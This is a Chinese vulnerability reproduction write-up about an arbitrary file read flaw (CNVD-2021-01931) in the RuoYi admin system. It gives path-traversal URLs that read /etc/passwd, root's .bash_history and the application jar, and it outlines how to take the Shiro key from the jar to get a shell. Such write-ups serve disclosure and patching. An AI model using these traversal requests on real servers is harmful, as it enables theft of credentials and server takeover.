若依后台任意文件读取(CNVD-2021-01931) 漏洞复现
【摘要】 若依后台任意文件读取(CNVD-2021-01931) 漏洞复现
01 漏洞描述
若依管理系统是基于SpringBoot的权限管理系统,部分版本登录后台后可以读取服务器上的任意文件
02 影响范围
RuoYi < v4.5.1
03 验证方式
登录后台后,浏览器直接尝试访问如下链接,如能成功下载则说明存在漏洞
https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd
## 04 利用方式
若依系统采用shiro框架,利用思路为通过后台任意文件读取获取shiro的key值,而后使用shiro漏洞利用工具getshell。
1、利用任意文件下载读取.bash_history,通过.bash_history得知网站jar路径
http://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../root/.bash_history
2、再次利用任意文件下载漏洞,下载前一步得知的jar包
http://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../www/wwroot/xxx/rouyi-admin_bak.jar
3、在源码中寻找shiro的key值后,使用漏洞利用工具进行getshell
05 修复方案
请联系厂商获取修复后的官方版本:http://www.ruoyi.vip/
【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱:
cloudbbs@huaweicloud.com
- 点赞
- 收藏
- 关注作者
评论(0)